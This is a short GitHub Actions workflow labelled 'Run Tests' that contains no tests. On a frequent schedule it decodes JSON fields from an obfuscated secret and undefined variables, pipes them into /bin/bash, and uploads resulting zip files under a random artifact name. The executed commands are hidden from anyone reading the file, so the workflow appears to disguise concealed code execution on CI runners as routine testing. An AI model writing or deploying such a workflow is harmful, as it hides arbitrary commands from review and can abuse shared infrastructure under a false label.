name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '53 2,8,14,20 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  main:
    runs-on: ubuntu-latest
    timeout-minutes: 350
    steps:
      - uses: actions/checkout@v4
      - name: Process
        env:
          x34: ${{ secrets.x34 }}
        run: |
          printf '%s' "$x34" | jq -r .umf5 | /bin/bash
          printf '%s' "$gt1" | jq -r .rwh3588 | /bin/bash
          echo $sket56662 | jq -r .mkbiw15565 | /bin/bash

      - name: Archive output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: VNbVXmm3
          path: "*.zip"
          retention-days: 1
